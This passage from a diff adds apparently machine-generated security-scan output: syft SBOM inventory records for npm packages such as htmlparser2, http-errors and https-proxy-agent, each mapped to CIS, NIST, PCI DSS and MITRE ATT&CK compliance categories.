"pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9e434aef3ca36a26", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: html-entities 2.6.0", + "title": "html-entities 2.6.0", + "description": "Package discovered: html-entities 2.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4d1e475b46ee4f29", + "name": "html-entities", + "version": "2.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/html-entities@2.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz", + "integrity": "sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "73fec784f0f7a1eb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: html-to-text 9.0.5", + "title": "html-to-text 9.0.5", + "description": "Package discovered: html-to-text 9.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "41ee91a75a779a86", + "name": "html-to-text", + "version": "9.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/html-to-text@9.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz", + "integrity": "sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg==", + "dependencies": { + "@selderee/plugin-htmlparser2": "^0.11.0", + "deepmerge": "^4.3.1", + "dom-serializer": "^2.0.0", + "htmlparser2": "^8.0.2", + "selderee": "^0.11.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c43d43edb7287d6e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: htmlparser2 8.0.2", + "title": "htmlparser2 8.0.2", + "description": "Package discovered: htmlparser2 8.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4a5b4c89e570771b", + "name": "htmlparser2", + "version": "8.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/htmlparser2@8.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz", + "integrity": "sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA==", + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.3", + "domutils": "^3.0.1", + "entities": "^4.4.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f927a519c85962f3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: http-errors 2.0.1", + "title": "http-errors 2.0.1", + "description": "Package discovered: http-errors 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bf2c5c4cccddf639", + "name": "http-errors", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/http-errors@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz", + "integrity": "sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ==", + "dependencies": { + "depd": "~2.0.0", + "inherits": "~2.0.4", + "setprototypeof": "~1.2.0", + "statuses": "~2.0.2", + "toidentifier": "~1.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "af32118f21902d1f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: http-parser-js 0.5.10", + "title": "http-parser-js 0.5.10", + "description": "Package discovered: http-parser-js 0.5.10", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b85e63dfe0c1efe8", + "name": "http-parser-js", + "version": "0.5.10", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/http-parser-js@0.5.10", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz", + "integrity": "sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2fd1314214cea39c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: http-proxy-agent 5.0.0", + "title": "http-proxy-agent 5.0.0", + "description": "Package discovered: http-proxy-agent 5.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "91bc09c317f85f97", + "name": "http-proxy-agent", + "version": "5.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/http-proxy-agent@5.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz", + "integrity": "sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==", + "dependencies": { + "@tootallnate/once": "2", + "agent-base": "6", + "debug": "4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d375a13b9232535f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: https-proxy-agent 5.0.1", + "title": "https-proxy-agent 5.0.1", + "description": "Package discovered: https-proxy-agent 5.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ac843d04db23cee1", + "name": "https-proxy-agent", + "version": "5.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/https-proxy-agent@5.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "56bdc5dcaf0f0066", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: https-proxy-agent 7.0.6", + "title": "https-proxy-agent 7.0.6", + "description": "Package discovered: https-proxy-agent 7.0.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2d10e944bb8687bf", + "name": "https-proxy-agent", + "version": "7.0.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/https-proxy-agent@7.0.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": 